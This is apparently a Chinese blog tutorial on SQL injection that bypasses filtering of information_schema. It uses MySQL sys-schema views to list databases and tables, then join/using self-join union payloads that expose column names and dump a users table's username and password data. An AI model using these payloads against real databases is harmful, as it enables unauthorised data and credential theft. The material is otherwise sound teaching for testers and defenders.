【网络安全】SQL注入——无列名注入

一、前言

今天来学习一下无列名注入,无列名注入是什么。我们在真实环境渗透测试的时候很大概率会遇到WAF或者正则,其中在SQL注入的时候被过滤掉information,导致无法查询到表名。

二、information

information是什么,有基础的应该知道information是MySQL自带的数据库,其中包含表名,列名这些关键的信息。

sql注入一般都会用到information_schema这个库(mysql自带的库),禁用掉这个表是一个很好的防御手段,这时候就可以使用无列名注入来绕过。如果information被过滤掉了,该怎么办呢?

2.1sys库

MySQL 5.7开始增加了sys库,这个库可以用于快速了解系统元数据信息。sys库通过视图的形式把information_schema和performance_schema结合起来,查询令人容易理解的数据。

sys库的两种形式:

(1). schema_table_statistics_with_buffer

sql 复制代码
#查询数据库名
select table_schema from sys.schema_auto_increment_columns;
sql 复制代码
#查询表明
select table_name from sys.schema_auto_increment_columns where table_schema=databse();

(2). x$schema_table_statistics_with_buffer

sql 复制代码
# 查询数据库
select table_schema from sys.schema_table_statistics_with_buffer;
python 复制代码
# 查询指定数据库的表
select table_name from sys.schema_table_statistics_with_buffer where table_schema=database();

三、无列名注入

join------用于合并两个表;

using------表示使用什么字段进行连接;

通过join自连接同一张表制造重复列名错误,再利用using子句强制暴露所有列名结构。进行union select注入时,前后查询结果的列数必须严格一致,否则会引发错误。

得到 id 列名重复报错

select * from users where id='1' union all select * from (select * from users as a join users as b)as c;

得到 username 列名重复报错

select * from users where id='1' union all select * from (select * from users as a join users as b using(id))as c;

得到 password 列名重复报错

select * from users where id='1' union all select * from (select * from users as a join users as b using(id,username))as c;

得到 user 表中的数据

select * from users where id='1' union all select * from (select * from users as a join users as b using(id,username,password))as c;

相关推荐
handsome123452 天前
exsi 6.7 打补丁
安全·升级·补丁·exsi·exsi6.7
CloudDM3 天前
SQL 审核工具深度体验(一): CloudDM vs Archery vs Yearning vs Bytebase
sql
深盾安全4 天前
逆向分析之if语句与循环语句的分析
安全
你的人类朋友5 天前
什么是OpenSSL
后端·安全·程序员
支付宝体验科技5 天前
AI4SDL:支付宝业务应用研发安全保障体系建设实践
安全
没逻辑5 天前
Post-Quantum HTTPS:未来的安全通信架构
后端·安全
LH_R5 天前
OneTerm开源堡垒机实战(四):访问授权与安全管控
运维·后端·安全
LH_R6 天前
OneTerm开源堡垒机实战(三):功能扩展与效率提升
运维·后端·安全
你的人类朋友7 天前
什么是API签名?
前端·后端·安全
深盾安全7 天前
ProGuard混淆在Android程序中的应用
安全